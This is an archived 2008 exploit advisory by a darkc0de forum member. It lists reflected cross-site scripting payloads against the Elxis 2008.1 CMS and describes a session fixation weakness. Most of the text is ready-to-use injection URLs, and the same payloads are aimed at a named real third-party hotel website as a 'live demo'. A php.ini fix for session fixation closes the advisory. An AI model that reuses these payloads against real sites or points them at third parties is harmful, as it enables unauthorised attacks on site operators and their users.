elxis-xss.txt

elxis-xss.txt: Posted Oct 14, 2008; Authored by swappie aka faithlove; Elxis 2008.1 Nemesis suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 52e5c51e245da274ad283a3c10f4b45c4b1d8cee2ed3f31a4835edc5494f2b46; Download | Favorite | View

elxis-xss.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
################################################################ 
# Greetings to  --d3hydr8 -r45c4l -baltazar -sinner_01          #
#       -C1c4Tr1Z -Gabitzu and all darkc0de members            # 
;############################################################### 
# 
# Author: swappie [aka] faithlove 
# 
# Home : www.darkc0de.com
#
# Email : swappieakafaithlove@gmail.com
# 
# Do researching and share! 
# 
;############################################################### 
# 
# Title: Elxis 2008.1 Nemesis
#
# Issue Date: Monday, 29 September 2008
#
# CMS Link: https://www.elxis-downloads.com/fserver/96.html

# Vendor: https://www.elxis.org/
# 
#
;###############################################################
#
# Dork: I'm sure you can figure that by yourself, right?
#
#################################################################


----------
XSS Vulns;
----------

https://www.site.com/?>'"><script>alert("XSS Vuln")</script>

https://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>

https://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>

https://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

https://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

https://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

https://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

https://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>

----------
Live Demo;
----------

https://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>

https://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>

https://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>

https://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

https://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

https://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

https://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

https://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>


;==================================================================;
;==================================================================;

-----------------
Session Fixation;
-----------------


https://www.site.com/?PHPSESSID=[session_fixation]

Explanation:

The user's session ID could be fixed by the attacker before the user
even logs on the target server so it wouldn't be needed to get the session
ID afterwards.

How to fix the "session fixation" ?

There is a simple way to do it.

Step 1.

Open the file named php.ini from your server.

Step 2.

Look through the file for the following lines:

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

; session.use_only_cookies = 1    !![PLEASE NOTE THE ";"]!!


Step 3.

=> [ and make it look like this: ]

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

session.use_only_cookies = 1

Step 4.

Restart the web server, php, whatever.



Cheers,

swappie [aka] faithlove

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 55 files
LiquidWorm 20 files
Debian 18 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

elxis-xss.txt

elxis-xss.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

elxis-xss.txt

Share This

elxis-xss.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems